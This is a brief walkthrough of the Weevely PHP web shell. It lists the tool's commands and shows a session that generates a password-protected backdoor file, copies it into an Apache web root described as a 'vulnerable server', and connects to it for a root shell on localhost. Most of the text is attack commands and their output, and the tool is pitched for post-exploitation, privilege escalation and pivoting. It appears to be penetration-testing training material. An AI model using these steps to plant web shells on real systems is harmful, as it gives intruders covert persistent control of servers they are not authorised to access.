Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.
The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.
[+] Start ssh-like terminal session weevely <url> <password> [+] Run command directly from command line weevely <url> <password> [ "<command> .." | :<module> .. ] [+] Generate PHP backdoor weevely generate <password> [ <path> ] .. [+] Show credits weevely credits [+] Show available module and backdoor generators weevely help
cyborg@cyborg:~$ sudo weevely generate aaa123 '/home/cyborg/bdoor.php' [generate.php] Backdoor file '/home/cyborg/bdoor.php' created with password 'aaa123'
Now Start the Apache server :
cyborg@cyborg:~$ sudo service apache2 start [sudo] password for cyborg: * Starting web server apache2 AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message
Check whether file is there or not :
cyborg@cyborg:~$ ls bdoor.php Documents examples.desktop Pictures Videos Desktop Downloads Music Public
Copy file to vulnerable server in this case we use our apache server (/var/www) :
cyborg@cyborg:~$ sudo cp bdoor.php /var/www/html
Now connect to the file hosted on server , in this case our localhost :
cyborg@cyborg:~$ sudo weevely http://127.0.0.1/bdoor.php aaa123 ________ __ | | | |-----.----.-.--.----' |--.--. | | | | -__| -__| | | -__| | | | |________|_____|____|___/|____|__|___ | v1.0 |_____| Stealth tiny web shell [+] Welcome to Weevely. Browse filesystem and execute system commands. [+] Use ':help' to list available modules and run selected one. root@cyborg:/var/www/html $